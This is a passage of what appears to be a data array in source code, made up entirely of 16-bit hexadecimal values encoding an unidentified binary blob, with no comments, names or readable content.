    0x3137, 0xd3ed, 0x6917, 0x14cf, 0x7164, 0x5f32, 0x09c7, 0xbfe2, 0x652b, 
    0x56f1, 0xe014, 0xbc65, 0x19c9, 0x5557, 0xb964, 0x995d, 0x7239, 0x138c, 
    0xe967, 0xc07b, 0xdb12, 0x8b97, 0x224c, 0x43dd, 0xf6e8, 0x91a2, 0x3963, 
    0x45a2, 0x2a9f, 0x29c6, 0x9da0, 0xaffa, 0x9bf0, 0x4938, 0x95dc, 0x6095, 
    0x0f80, 0xeb53, 0x56b2, 0xd391, 0x2d95, 0xe473, 0x53f4, 0xd6ad, 0x5a71, 
    0xc3c7, 0xe289, 0x8448, 0x9a51, 0xa727, 0x6e9f, 0x9429, 0x2fd3, 0x16b5, 
    0x938c, 0x1e3b, 0x58be, 0x1a9c, 0x271a, 0xa406, 0x428e, 0x96c4, 0xf02b, 
    0x4595, 0xbba4, 0xa342, 0x1d9a, 0x05b8, 0x7306, 0xec85, 0x2c53, 0x1279, 
    0xe43c, 0xdfc7, 0x94d8, 0x8b3a, 0x0902, 0x427e, 0x6339, 0x7018, 0xed8d, 
    0x5c16, 0xf369, 0x2f2b, 0xca02, 0x41f5, 0xf976, 0xc158, 0xf2ca, 0x0def, 
    0x0df2, 0x65a1, 0xd5d1, 0xa8b7, 0x35e3, 0x7eed, 0x5208, 0xef83, 0xa4e3, 
    0x917c, 0x316f, 0x43ca, 0xc306, 0xea71, 0x22e8, 0x4e30, 0x6a1d, 0x401a, 
    0xc037, 0x8436, 0xf816, 0x84ac, 0x05ba, 0x82ea, 0xb133, 0xc8bc, 0x58b4, 
    0x170d, 0xc359, 0x6ac5, 0x8072, 0x646c, 0x8e4d, 0x603c, 0x0790, 0xf119, 
    0x1393, 0xd5c4, 0x6475, 0x9702, 0x7161, 0x40f2, 0x3c8e, 0x8398, 0x3f58, 
    0xc09d, 0xd6ea, 0x6a71, 0x6300, 0xce0d, 0x9dec, 0xfebc, 0x013f, 0x849c, 
    0x0fda, 0x08f5, 0x43d4, 0xdf50, 0xba85, 0xea1f, 0x281b, 0xd57f, 0x2e8f, 
    0xab44, 0x7c7e, 0xa001, 0x5006, 0x7803, 0xe009, 0x8025, 0x00c3, 0x0187, 
    0x035e, 0x0d78, 0x1a60, 0x1a60, 0x0660, 0xbc20, 0x5523, 0x8abc, 0xc30d, 
    0xf486, 0x25b8, 0x2a28, 0x1e4c, 0x1620, 0xd423, 0xa862, 0x7770, 0x3534, 
    0x489f, 0xa376, 0x9374, 0xbadb, 0xd9e6, 0x9011, 0x0ef1, 0x806b, 0xc629, 
    0x5571, 0x3bf1, 0xb519, 0x3cad, 0xb593, 0xe3bf, 0xfdb6, 0xa34d, 0xdf57, 
    0x00ca, 0xf0df, 0xe422, 0xfd7b, 0x60b7, 0xa5e5, 0x988b, 0xe3be, 0xb8fe, 
    0xfba1, 0x3163, 0x23fa, 0x00f2, 0x07f3, 0x7722, 0x0ebf, 0x3eed, 0x43a8, 
    0x6350, 0x8635, 0x6705, 0x6b22, 0x4f0c, 0xe100, 0x9127, 0xe1ec, 0x6449, 
    0xae51, 0xfcec, 0x1f6d, 0xce5d, 0xbf91, 0xd664, 0x3bdf, 0xb309, 0x127b, 
    0x201e, 0xf6dd, 0x65d5, 0xfc83, 0x8a25, 0x7e6b, 0x29e5, 0x3b38, 0xd277, 
    0x0e5e, 0x2560, 0x2ad4, 0xb5a8, 0x1b50, 0x6ea0, 0xba82, 0x6a15, 0x22eb, 
    0x97e6, 0xb022, 0x1173, 0x3b40, 0x3b40, 0x2b40, 0x2b40, 0x0b40, 0x9c40, 
    0x0237, 0x0234, 0x0014, 0x000a, 0x8079, 0x9dfc, 0xd17e, 0xd3ed, 0xdf0d, 
    0xa1d7, 0x801e, 0x647a, 0x24d1, 0xd4bf, 0x4018, 0x49ea, 0x607e, 0x3bfd, 
    0x307d, 0xec79, 0xbf0e, 0xdd05, 0x7b1c, 0x4cd4, 0x56ca, 0xf1e0, 0x4f84, 
    0x8918, 0xca4b, 0xdf0b, 0xb765, 0x42f2, 0xdc7c, 0x1090, 0x7bd7, 0xdd80, 
    0x6fb7, 0x17c2, 0x77ff, 0x436f, 0x07b2, 0x5427, 0x9863, 0x9c3d, 0x6354, 
    0x95c4, 0x65d8, 0x1a55, 0x0420, 0x8c7b, 0x371d, 0xddf1, 0x32d4, 0x8e4d, 
    0x535b, 0x5c1a, 0x2cc0, 0x4324, 0x82b8, 0x29e3, 0xb640, 0x6959, 0xbe51, 
    0xfc5a, 0xa37d, 0x54f2, 0x3e46, 0xf196, 0x2e27, 0x959b, 0xca53, 0x994b, 
    0x4ee7, 0x70f0, 0x3d15, 0x6d1e, 0xa8cf, 0xb97b, 0x902a, 0xba2c, 0x5af9, 
    0x6eb4, 0x3158, 0x8e16, 0xb824, 0x5d68, 0xfa5a, 0xc49b, 0x3e0d, 0xd8f4, 
    0xe6ba, 0x9d68, 0xf5d1, 0xbbef, 0xf80d, 0x4003, 0x216d, 0xaaef, 0x142d, 
    0xb5a4, 0x9d4a, 0xbe51, 0xbc51, 0xe8ab, 0x8c43, 0x1faa, 0xa97f, 0x72d6, 
    0xf5fc, 0x2573, 0xef6d, 0x8d55, 0x4be5, 0x818b, 0x496b, 0xca79, 0x2721, 
    0xb286, 0x80d3, 0xc59d, 0xf238, 0x3f5e, 0x010c, 0x1e52, 0xed22, 0x81e1, 
    0xa0a2, 0x15b4, 0x51f2, 0xe4d6, 0x29a1, 0x3618, 0xa3a7, 0x047b, 0x4610, 
    0x95b9, 0xfca0, 0x3293, 0x6c7d, 0x21b7, 0x58f4, 0x7ff3, 0xf7b3, 0xe034, 
    0x554d, 0xbe59, 0x5794, 0xdb48, 0x0494, 0x522c, 0xd018, 0x1430, 0x0417, 
    0x35f4, 0x69ff, 0xfe92, 0xa6d0, 0xa5b4, 0x96c5, 0x07f4, 0x22c5, 0x79a1, 
    0x94d0, 0x6490, 0xf792, 0x450a, 0x608a, 0x9dda, 0x9e3e, 0x7019, 0x73f1, 
    0x8670, 0x7e45, 0x7474, 0x7475, 0x711d, 0x5967, 0xc765, 0x5856, 0x6440, 
    0x01fd, 0x1947, 0x83e0, 0xa8aa, 0x30c5, 0x238a, 0xa503, 0xfb76, 0x9cf6, 
    0x12fb, 0x2828, 0xbb8e, 0xdf9f, 0xb7ce, 0xf4df, 0xdf7e, 0xfde9, 0xf73b, 
    0x73de, 0x3dcf, 0xdce7, 0xcf7b, 0x2f7b, 0x2b15, 0x23fa, 0x001f, 0xe75d, 
    0xedd4, 0xa0db, 0xe98b, 0xfd35, 0x4250, 0x1428, 0x7a6a, 0xef4b, 0x1db1, 
    0x3202, 0x939b, 0x9805, 0xa1f3, 0xf561, 0xe2fd, 0xd0d7, 0x3601, 0xf5b7, 
    0x2735, 0x7d89, 0xb7b6, 0x65b8, 0x4562, 0x58af, 0xdb45, 0x06aa, 0xff51, 
    0x2132, 0x33ef, 0xdb42, 0x4991, 0x57d5, 0x1fa9, 0xa845, 0x578f, 0xa827, 
    0x323f, 0x91e9, 0xa86b, 0xa2af, 0x9749, 0xb14a, 0x1694, 0xe4ca, 0x2d34, 
    0x2a96, 0x3285, 0x58a5, 0x1bd3, 0x3d69, 0xf147, 0xd629, 0x9556, 0x4dba, 
    0xf3c0, 0xc557, 0xa8f9, 0x72ea, 0x1302, 0x80d3, 0x0026, 0x197e, 0x402d, 
    0x650f, 0xadb4, 0xc94c, 0xac37, 0x1f2f, 0x4741, 0x6d24, 0x8547, 0xa07a, 
    0x03ab, 0xe1d2, 0x6b29, 0xd55b, 0x3f14, 0x15f2, 0x4424, 0xeb7c, 0x0c68, 
    0x4d86, 0x7719, 0x1725, 0x7a2d, 0x28a1, 0x3325, 0x8d36, 0x6920, 0x77a2, 
    0x9375, 0x191a, 0x6eeb, 0xf21a, 0xd589, 0x2369, 0xa774, 0x4458, 0xaa60, 
    0xbcf3, 0x5e30, 0xf7b8, 0x7ea6, 0xa949, 0xef6e, 0x3bc3, 0x8a30, 0x3a1d, 
    0x4f6c, 0x9923, 0x4fe9, 0xe2d4, 0x4093, 0x93bc, 0x7d77, 0x1ea0, 0xa256, 
    0x057a, 0xe22f, 0x6ee4, 0xaaee, 0xde92, 0xeb97, 0x9349, 0x7338, 0x2a52, 
    0x2495, 0x6f1b, 0xaf99, 0x3c89, 0x81d1, 0xc983, 0x42fd, 0xa07e, 0x50a4, 
    0x964e, 0xd668, 0x14b6, 0x4f02, 0x8b22, 0x01e8, 0x1252, 0xa959, 0x7894, 
    0x5c1f, 0xa44b, 0x4aa0, 0x9f7a, 0x4914, 0xcd41, 0x17b5, 0x220b, 0xe2f4, 
    0x2218, 0xf4f2, 0xaeda, 0x24ee, 0x20f1, 0x8441, 0xbced, 0xd47c, 0xaab9, 
    0x4968, 0x5546, 0xcf65, 0x5486, 0x67e2, 0x0b83, 0x9482, 0xf88e, 0x64b6, 
    0x6944, 0x161e, 0xc9e9, 0xd310, 0xa9b1, 0x8e90, 0x14ca, 0xbd43, 0x89dd, 
    0x8255, 0x8911, 0x0725, 0x5922, 0x0655, 0xe30d, 0x85aa, 0xea81, 0xf6a2, 
    0x0107, 0x7519, 0x64a3, 0xe46c, 0xf383, 0x17a0, 0x6a20, 0x20a5, 0xad34, 
    0xe123, 0x7550, 0xf3f4, 0x4548, 0x24af, 0x17f0, 0x1a62, 0x9310, 0x41c8, 
    0x7f49, 0x68f1, 0x640f, 0x6705, 0x76ef, 0x491c, 0x663c, 0x0d3b, 0xde87, 
    0x38f0, 0x0e71, 0xda2d, 0x5726, 0x4ef4, 0x481e, 0x8b7b, 0x8b4f, 0xcdec, 
    0xd5b0, 0x43f7, 0xe845, 0x8853, 0x16f9, 0xb8f1, 0x18ed, 0x8da2, 0x06b9, 
    0x192d, 0x62d0, 0xd89f, 0xf18e, 0x0377, 0x7852, 0xe454, 0x257e, 0x2bc5, 
    0x0ca1, 0x6330, 0xc47f, 0xb776, 0xda25, 0x93a5, 0x823a, 0x39ff, 0x8fe0, 
    0xb1ec, 0xe124, 0xbbb1, 0x04fd, 0x7254, 0xae19, 0xe39e, 0x58f8, 0x9c4c, 
    0x11a3, 0x6214, 0x26a1, 0x9162, 0x10e0, 0x79de, 0x0d56, 0xc285, 0x4244, 
    0xa165, 0xd446, 0xfa44, 0xa124, 0x9fa6, 0x10cb, 0xda1f, 0xcb88, 0xae26, 
    0x58de, 0x2094, 0x2cc4, 0x45ca, 0xa2c1, 0x35c9, 0x93bd, 0x0bf9, 0x6678, 
    0x968e, 0xa514, 0x27bd, 0x17f2, 0xb1f8, 0xc3e2, 0x786d, 0x7440, 0x43f6, 
    0xdc25, 0xc427, 0xc981, 0xb4d6, 0xb9f7, 0x70b3, 0x1646, 0xe90f, 0xd925, 
    0x24b8, 0x4b0c, 0x05c5, 0x1cb1, 0x7dfa, 0x4f93, 0x0f8f, 0xa4d3, 0x4185, 
    0x6bee, 0x7d7f, 0xf275, 0x1f3b, 0x8ecc, 0x125d, 0xa101, 0x32fa, 0xa62d, 
    0x074e, 0xf3fb, 0xd825, 0xae9e, 0x7a01, 0x646e, 0x6f20, 0x280d, 0x42fe, 
    0x25db, 0x5b75, 0xde3a, 0x6427, 0x7125, 0x8283, 0x4eb4, 0xa41f, 0xb011, 
    0x59df, 0x4be8, 0x8547, 0x73fa, 0xef93, 0x28ed, 0x0012, 0xd406, 0x883c, 
    0x52ba, 0x38ac, 0x2937, 0x962d, 0x583d, 0x082f, 0xf46e, 0x2221, 0x97a1, 
    0x4e8e, 0x371a, 0x86a0, 0x7c66, 0x1c5a, 0x0e79, 0x220d, 0x4902, 0xe050, 
    0x7455, 0xb5a4, 0x4297, 0x04ab, 0xbafa, 0x094a, 0x4906, 0xf6dd, 0xd108, 
    0x0be3, 0xeae2, 0xe92f, 0xeaa8, 0x614b, 0xfd15, 0x2a2d, 0x59ec, 0x3e5f, 
    0x8e9c, 0x800c, 0xa70a, 0x4eb5, 0xe81b, 0xdb5a, 0x469a, 0x4075, 0x9f09, 
    0x5446, 0x7c51, 0xe8f3, 0x2917, 0x2bb6, 0xa049, 0x6527, 0x4775, 0xec51, 
    0x41ce, 0xe988, 0xb9d1, 0xb509, 0xb94d, 0x469f, 0xf78a, 0x6a10, 0xf8a1, 
    0xa477, 0xf3f8, 0x3314, 0x9a98, 0xd7f6, 0x34b9, 0x5521, 0x1f28, 0x0fd5, 
    0x8324, 0xe1e5, 0x0fcf, 0x277b, 0x573a, 0x4581, 0x7eba, 0x1f58, 0x6471, 
    0xebfb, 0x16d1, 0x9085, 0x8fcb, 0x4db7, 0x9144, 0x47e7, 0x5f43, 0xa236, 
    0xfca4, 0xf888, 0x035e, 0x8225, 0x3a32, 0x268b, 0x208a, 0x40ab, 0x36fa, 
    0x95e2, 0x4bd3, 0x2eb6, 0x899e, 0x0916, 0xa095, 0x9572, 0x9bb2, 0x2ead, 
    0x97a1, 0x812f, 0xda5e, 0x700e, 0x88ee, 0x39bc, 0x0d91, 0xde2c, 0x931a, 
    0xfb8d, 0x600a, 0x9581, 0x45a0, 0x8372, 0x61a8, 0xbc9d, 0xd9d7, 0x080e, 
    0x1ac5, 0xf6ee, 0xba26, 0x5f11, 0x2779, 0xbeae, 0x693a, 0x0bcc, 0x1af1, 
    0x9f15, 0x3521, 0x1d5f, 0x2364, 0x1df1, 0xc6c6, 0xe646, 0x252a, 0x5721, 
    0x4358, 0xc94b, 0x8864, 0x4d62, 0x2944, 0x65e1, 0x3c86, 0x200d, 0x5bfb, 
    0xf89d, 0x8d13, 0xa058, 0x9fd4, 0xef68, 0x7904, 0x2eea, 0x7904, 0xdbda, 
    0xe794, 0x44ed, 0xbc09, 0xda27, 0x10c6, 0x7411, 0x0bf6, 0x4af9, 0x9f21, 
    0x748e, 0xcb2a, 0x3d80, 0x375f, 0x5dd1, 0xaa9f, 0xb587, 0x88a8, 0x9333, 
    0x1b78, 0xb4e3, 0x77b4, 0xb682, 0x941d, 0x6ece, 0xa642, 0x1cff, 0x33bf, 
    0xf5b0, 0xb0ad, 0x6747, 0x226b, 0xbd25, 0xa452, 0x9ce3, 0x841a, 0xda3e, 
    0x0fd1, 0x81d1, 0xfefc, 0x10f3, 0x0b01, 0xfa3b, 0x90bf, 0xa124, 0x3e84, 
    0xb6b0, 0x0a07, 0x30b0, 0xbb19, 0x968d, 0xb79c, 0x6a1d, 0x803e, 0x108f, 
    0x52ee, 0xf725, 0xc82a, 0x57a3, 0x1340, 0x940a, 0x32d1, 0x5095, 0x14a2, 
    0xe80a, 0x6788, 0x116b, 0xec25, 0x8ad9, 0xbc6b, 0xb8be, 0xfd70, 0x81c1, 
    0xb6ae, 0x304e, 0x1d3d, 0x0b73, 0x61f9, 0x2b29, 0x6269, 0xc566, 0x8e37, 
    0x067e, 0x4fdb, 0x52a5, 0x2bdc, 0x153f, 0x6f42, 0x87aa, 0x14ac, 0xab3f, 
    0xbfb1, 0x1910, 0x27b6, 0xece1, 0x2a5d, 0x771a, 0x8be3, 0xe722, 0x09d1, 
    0xbd28, 0x2707, 0xc40c, 0x2ae4, 0xbb1b, 0x82e5, 0xc3c6, 0xef18, 0x446c, 
    0xfb73, 0x4ede, 0x2e1f, 0x235e, 0x02d9, 0x9bb8, 0xb7a5, 0x7ad1, 0x2370, 
    0xfbb7, 0x82e4, 0x1764, 0x4896, 0x565c, 0x0266, 0x72e0, 0x91ee, 0x274d, 
    0x1ef1, 0x4e1d, 0x7404, 0xd47f, 0x5081, 0xaaae, 0x8975, 0x107f, 0xacb9, 
    0x4b8c, 0x87fb, 0x7311, 0x0592, 0x06e2, 0x3b67, 0x103e, 0xb49b, 0x787e, 
    0xc771, 0xd988, 0xdca5, 0xb814, 0x4d9e, 0xeb93, 0x18f9, 0x88b9, 0x55f1, 
    0x8f91, 0x7186, 0x32e9, 0xd402, 0x39de, 0xff87, 0xee0a, 0x9a97, 0x0b05, 
    0xdbef, 0x9f2b, 0xb964, 0xd8d1, 0xdd54, 0x9eb6, 0x72ba, 0xf8b7, 0x6e5c, 
    0x83ea, 0x398a, 0xdf7c, 0x8582, 0x23b2, 0xf884, 0x4a59, 0x7fb9, 0x5d96, 
    0xc32d, 0xae13, 0x9b96, 0xfb23, 0x2ee3, 0x538f, 0xa770, 0xd19f, 0x9176, 
    0x25bb, 0x6aee, 0xc951, 0x16ae, 0xbf7e, 0x3630, 0xb996, 0x43ee, 0xd8fc, 
    0x5206, 0x2123, 0x9145, 0xad14, 0x423f, 0xd4fa, 0x9677, 0xa972, 0x4efa, 
    0x0461, 0xcff6, 0x02f7, 0x7cc1, 0x827b, 0x9846, 0x757f, 0x0a96, 0x21fd, 
    0x47ed, 0xd9b8, 0xcefa, 0x40f5, 0x9d4a, 0x3978, 0x47d2, 0x6687, 0xfa5e, 
    0x5c03, 0x3931, 0xf4e5, 0x7077, 0x7c02, 0x789f, 0xbc90, 0x8132, 0x0691, 
    0x43a2, 0x3a70, 0x5987, 0xc370, 0x7abf, 0x9a16, 0xa1c2, 0x767e, 0xe019, 
    0x2ec8, 0xb81d, 0xef60, 0x1edd, 0x5794, 0x8d42, 0x332e, 0x537c, 0x6ee1, 
    0x468e, 0xba7f, 0xc87c, 0x926b, 0x351a, 0xb845, 0x36d4, 0x0538, 0x6f93, 
    0x2a6d, 0xc23d, 0x8c14, 0xe723, 0x8026, 0x0862, 0x8f6c, 0xb25e, 0x363a, 
    0xd2a3, 0xd717, 0x35d5, 0x1629, 0x1ab8, 0xd055, 0x5c80, 0x6b12, 0xe041, 
    0xc867, 0x278f, 0xc295, 0xc444, 0xfd89, 0xaeb8, 0xd5ce, 0x2ca8, 0xb942, 
    0xc692, 0xccac, 0xcf97, 0x3f05, 0xe056, 0x0ed3, 0x47ac, 0xb8e7, 0x35b5, 
    0x8d63, 0x0246, 0xe55d, 0x3d35, 0xd15b, 0x7ae3, 0xe0b7, 0xd8cc, 0xb58e, 
    0xe0f8, 0xa261, 0x4fc4, 0xf890, 0xb94c, 0xe25e, 0x1255, 0x94af, 0x3a3b, 
    0x2a7b, 0x90f1, 0x28e4, 0x44e9, 0x2bcb, 0x4389, 0x7041, 0xeb6a, 0x64ea, 
    0xd174, 0x4599, 0xa29e, 0x2b76, 0x2bf3, 0x5e25, 0x8d2b, 0x50e1, 0x61a2, 
    0x3ba3, 0x3b63, 0x6ead, 0x82db, 0x01ab, 0x31db, 0xa3fd, 0xe748, 0xacb0, 
    0x9efe, 0x4767, 0x9e40, 0x11ed, 0x09f7, 0x93ce, 0x8a91, 0x297e, 0x1376, 
    0x45b2, 0x09c4, 0xad0b, 0x44a4, 0x3fac, 0x6d63, 0xc93d, 0x712d, 0xfc49, 
    0x7949, 0x2684, 0x95c5, 0x617e, 0x15d2, 0x5930, 0x2552, 0x3953, 0x3c83, 
    0x17ab, 0x63f8, 0x4bb6, 0xee9c, 0x33a2, 0xe69d, 0xadf2, 0x13ad, 0x6dd4, 
    0xe22f, 0x1d43, 0xc27e, 0xb703, 0x53c8, 0xbebb, 0xbe09, 0x8543, 0x800f, 
    0x12e0, 0x1ecf, 0x9384, 0x479d, 0x2740, 0x4530, 0xf4d4, 0xb380, 0x6f1f, 
    0x51cb, 0x24da, 0x7cd3, 0xb869, 0xf34c, 0xa149, 0x9bbe, 0x3cd0, 0x0afa, 
    0xfacd, 0x8413, 0x1864, 0x34fd, 0x52f7, 0x0c2d, 0xe672, 0xe31b, 0x5b70, 
    0x9e80, 0x3aba, 0xae9e, 0x8bab, 0x970d, 0xa989, 0x3575, 0xd16a, 0x809d, 
    0xcab3, 0xf424, 0x66e3, 0x13f9, 0x49e2, 0xeb3a, 0xa8c3, 0x4b3a, 0x7289, 
    0x7ed4, 0x36a4, 0x265a, 0xe971, 0x2d6b, 0xa714, 0x17cc, 0x2cbf, 0xbf6d, 
    0x7fc8, 0x9905, 0x7c85, 0x74f2, 0x3314, 0xb5f1, 0x38b8, 0xbd4d, 0x3891, 
    0xca65, 0xb4e2, 0x0b7d, 0x9a2c, 0x84fe, 0x2f6d, 0x1b9f, 0x9e75, 0x6ca9, 
    0x2c52, 0x25ac, 0x5512, 0x8d2b, 0x92c9, 0xa4a9, 0xfdc5, 0x89b1, 0x5758, 
    0x4b2b, 0x5812, 0xa98c, 0x4971, 0x2742, 0x5358, 0xfcd2, 0x5b9d, 0xd2e2, 
    0x2592, 0x273a, 0x4f40, 0xdbc9, 0xa2d7, 0x1a2d, 0x3324, 0x7295, 0xb39b, 
    0x278f, 0x0684, 0x5eb7, 0x7d6b, 0x15e6, 0xc9a1, 0xb974, 0x6464, 0xa9d1, 
    0x241d, 0x9934, 0xe2f2, 0xce0a, 0xdb6e, 0xae5e, 0xa841, 0x8fef, 0xe1da, 
    0x2b76, 0x7f33, 0xb255, 0xfccc, 0x020b, 0xb27f, 0x55ce, 0x53db, 0x4fd6, 
    0xca5c, 0xb4b1, 0x1ac4, 0xd09c, 0xc45f, 0xb035, 0xc57d, 0x934d, 0xeef8, 
    0xb95a, 0x147f, 0x7899, 0xd0af, 0x1225, 0x5959, 0xd64b, 0x6704, 0xcf8b, 
    0xa2c6, 0xe1ec, 0x56eb, 0xd89d, 0xffc3, 0x7fad, 0x6944, 0x76fd, 0x88ff, 
    0x42d6, 0xe3ee, 0x5699, 0x3fd9, 0x05b2, 0x1bb2, 0xf819, 0x2f73, 0xac00, 
    0xf7e3, 0x8ff3, 0xe760, 0xd97f, 0x823f, 0xdf58, 0x1fee, 0xb789, 0x6097, 
    0x73bc, 0x6700, 0x4e00, 0xbc02, 0x700b, 0x6018, 0xc01f, 0xcb1e, 0xe50f, 
    0x211f, 0x909c, 0xc270, 0x805a, 0x0019, 0xd6f9, 0x0bff, 0xc8ff, 0x9cb6, 
    0xfe2b, 0xca91, 0x1b9c, 0x47fa, 0xb69e, 0xf592, 0xe440, 0xbb8d, 0x7d21, 
    0x800c, 0xf9ca, 0xff0e, 0xb6c8, 0xef9c, 0x1feb, 0x7d21, 0x8ffe, 0x23fc, 
    0xbef1, 0x21ab, 0x17ba, 0x03c0, 0xcbe0, 0x17c1, 0x28a1, 0x6acd, 0x3680, 
    0x9f80, 0xfce7, 0xfe50, 0x9911, 0x2f3f, 0xdfc0, 0x00dd, 0x0107, 0xe64e, 
    0x40fc, 0x11fe, 0x6f59, 0xd0c0, 0x90d4, 0x1eb7, 0x3635, 0x0ab4, 0x9eca, 
    0xa0f3, 0xf52f, 0x5aa0, 0xc7e2, 0xf2f5, 0x8e73, 0x1a02, 0x290c, 0xde45, 
    0xe46f, 0xb8d4, 0x8259, 0xd399, 0x4908, 0x71bb, 0xf095, 0x198d, 0x96dc, 
    0x9b2b, 0x1a06, 0xd133, 0x498e, 0x2446, 0x6e3e, 0xa0c7, 0x2b46, 0x57ce, 
    0x418a, 0x6455, 0xe240, 0xb0ee, 0x5971, 0xdc59, 0xa8d4, 0x59a1, 0xed54, 
    0xca12, 0x94b3, 0x8942, 0xb22a, 0x177a, 0xf14d, 0x1ba3, 0x7815, 0x28e3, 
    0xa5da, 0xc1ec, 0x308f, 0xeaa5, 0xca5d, 0x5ed8, 0x06cf, 0x28f2, 0x8c05, 
    0x7c86, 0xf1fc, 0x4488, 0xd7e9, 0xd0b5, 0x1038, 0x606c, 0x2a55, 0x9e71, 
    0x5aca, 0xe4a5, 0xe593, 0x2f77, 0x555d, 0x04af, 0x605d, 0x5226, 0x09e3, 
    0xad38, 0x730a, 0x4294, 0x2d21, 0x532c, 0xbddd, 0x35e0, 0x3a9a, 0xb87c, 
    0x50b6, 0xccc7, 0x642f, 0x7218, 0xc50d, 0x2cb3, 0x9f5c, 0xc1ea, 0x29aa, 
    0xe52f, 0x4993, 0xdbaa, 0xc41f, 0xcf8d, 0x2bd9, 0xc13a, 0xf5ac, 0x9d47, 
    0x42bd, 0xbf61, 0x5618, 0xf789, 0x712b, 0xee06, 0xaaa8, 0xb239, 0x037a, 
    0x714d, 0xdace, 0xe89a, 0x8d32, 0xbd54, 0xae81, 0x085f, 0xa43d, 0x7275, 
    0x95fa, 0xc076, 0xf572, 0x13fc, 0x7679, 0x4346, 0xad6d, 0xe7ab, 0xc914, 
    0xa128, 0x9359, 0x8442, 0xee35, 0xe371, 0x412e, 0x106f, 0x550a, 0x56d0, 
    0x0d09, 0x4aa0, 0x6c34, 0x6d88, 0x5f27, 0xc71c, 0x9026, 0xc499, 0x60c6, 
    0x4de7, 0xab92, 0xab67, 0xbedc, 0x149e, 0x1627, 0x06a5, 0x4556, 0x4e29, 
    0x0b13, 0x5426, 0x058a, 0x9599, 0x2d3d, 0x2471, 0x4332, 0x5439, 0xc839, 
    0x1881, 0x42f0, 0xeb19, 0x62ce, 0x267a, 0x69fe, 0x9057, 0xf0f2, 0xe9b9, 
    0xc507, 0xed7d, 0xf10a, 0x5103, 0xe629, 0x95d3, 0x0f7b, 0x534b, 0xf9b4, 
    0x7fd7, 0x3b27, 0x8614, 0xdfc2, 0x184a, 0xa628, 0xf9a8, 0x8a4e, 0x020a, 
    0x01ac, 0x0f58, 0x05b0, 0xd160, 0x8a6c, 0x062a, 0x53f8, 0x4509, 0x0375, 
    0x09bc, 0x3bf0, 0x5b80, 0x9f00, 0xc801, 0x2805, 0x5807, 0xc004, 0xe315, 
    0x9295, 0x36a2, 0x3c03, 0xf001, 0xc03c, 0x801e, 0x0137, 0x014e, 0x439c, 
    0xe85c, 0x66f3, 0x6fe8, 0xc006, 0xe866, 0x79e7, 0x6680, 0xff48, 0xe00c, 
    0x8069, 0x02df, 0x03ec, 0x0238, 0x0a70, 0x0fa0, 0x3460, 0xdce0, 0x600e, 
    0x9802, 0x5005, 0x300e, 0xa01f, 0xdb11, 0x7402, 0xc894, 0xe873, 0xbe87, 
    0x007b, 0x05de, 0x0438, 0xdbb0, 0x7579, 0x217e, 0xcfde, 0x9779, 0x5ab3, 
    0x1436, 0x840a, 0x14b4, 0x5d55, 0x977e, 0x25cb, 0xd2e7, 0xd3f1, 0x5776, 
    0xdce9, 0x83d9, 0x54b2, 0x5dd1, 0x0515, 0x73a5, 0x96af, 0x33cc, 0x3a31, 
    0x7a4b, 0x4cea, 0xef2d, 0x2f77, 0xb1f6, 0x2e5a, 0xf5a0, 0xbdfa, 0xd79c, 
    0xf3ed, 0x62ae, 0x8db5, 0x3bac, 0xb728, 0x3c43, 0xe233, 0x4fe1, 0xb01e, 
    0x00fe, 0xb4bf, 0x1b51, 0xba0e, 0x581b, 0x12ed, 0xd718, 0x5817, 0x1de1, 
    0xd0d4, 0x79cd, 0xfe03, 0xedab, 0x374c, 0x176c, 0x3ce6, 0xd1df, 0x88ce, 
    0x82ed, 0x887c, 0x36d5, 0x437b, 0xef1c, 0x69f6, 0xf097, 0x06fe, 0xd1c4, 
    0xb836, 0x3e7d, 0x8882, 0x8678, 0xf61b, 0x5f7f, 0xcfc0, 0xf4ae, 0x7772, 
    0x39ba, 0xb48c, 0x4e1c, 0x4af1, 0xd9ff, 0x6bd6, 0x1de7, 0xb208, 0x71d0, 
    0x1fc0, 0x400e, 0xc3de, 0x7b36, 0x061b, 0xc6e1, 0xc479, 0x0cae, 0x0db2, 
    0xeb1c, 0x9c21, 0xcc19, 0xc457, 0x5f31, 0xb387, 0xf79c, 0x5e71, 0x31ae, 
    0xbac4, 0xc03d, 0x86a1, 0xd765, 0xdfe3, 0x2f98, 0x46f1, 0x1bf8, 0x8005, 
    0x9e9e, 0x5eea, 0x0fec, 0x9684, 0x0303, 0xbf12, 0xc13d, 0xa1b1, 0x5ee5, 
    0xb5ff, 0x62fc, 0x37ac, 0x8fec, 0x03f5, 0x0307, 0xe5fe, 0x9fac, 0x7403, 
    0xb5c4, 0x10dc, 0x1dd7, 0xca5a, 0x6223, 0xc138, 0x465f, 0xb887, 0x7c4b, 
    0x1801, 0xbfce, 0x1b54, 0x780c, 0x1cfd, 0x0a69, 0x1e25, 0x23d6, 0x5f8f, 
    0x6de1, 0x0508, 0x81c2, 0x9c25, 0xd6b6, 0xc61b, 0x2aa5, 0x3e9c, 0x3b5d, 
    0x2e2f, 0xe59c, 0xc5de, 0x7721, 0x05a8, 0x52f1, 0xe651, 0xc5e2, 0x644e, 
    0xa4c7, 0xd4d4, 0x794a, 0x3952, 0xc6f8, 0x1df4, 0xdc77, 0xd941, 0xb313, 
    0xbbf4, 0x8b01, 0x2ff7, 0x07f3, 0xf856, 0x2973, 0x366a, 0x95cb, 0xc3bb, 
    0x015c, 0x4088, 0x5b33, 0x0819, 0x41f2, 0x2652, 0xebe7, 0x7ebc, 0x604f, 
    0x5505, 0x86c1, 0xeec3, 0xeca5, 0xc0ac, 0x02ca, 0x0f8a, 0x21b3, 0xeebd, 
    0x8f0e, 0x77cf, 0x5f55, 0x9760, 0xf496, 0x4a46, 0x0663, 0xf4c0, 0x10a7, 
    0xe2c7, 0x65e9, 0x4a66, 0x0013, 0x1608, 0xc55d, 0x067f, 0x0d75, 0x2e8e, 
    0x4186, 0x373a, 0xf41a, 0x5f7d, 0xdffe, 0xbd9e, 0x9cb9, 0x0be4, 0xa173, 
    0x3706, 0x4057, 0xad51, 0xe00a, 0xccbc, 0x70f3, 0x3791, 0x0204, 0x081f, 
    0x40b5, 0x8ff9, 0x42a8, 0x205f, 0x96cc, 0xfdb8, 0x1f1e, 0x9d4b, 0xaa4e, 
    0x790b, 0xb639, 0x0bd8, 0xa6e9, 0x1724, 0x61cb, 0x12aa, 0x8805, 0x010d, 
    0xa94f, 0x1042, 0xb973, 0x80ba, 0xe39a, 0x379c, 0x59d7, 0x589e, 0x31af, 
    0x2154, 0xf8a8, 0x765c, 0x5725, 0x0812, 0x732c, 0xa4ae, 0x15a8, 0xd549, 
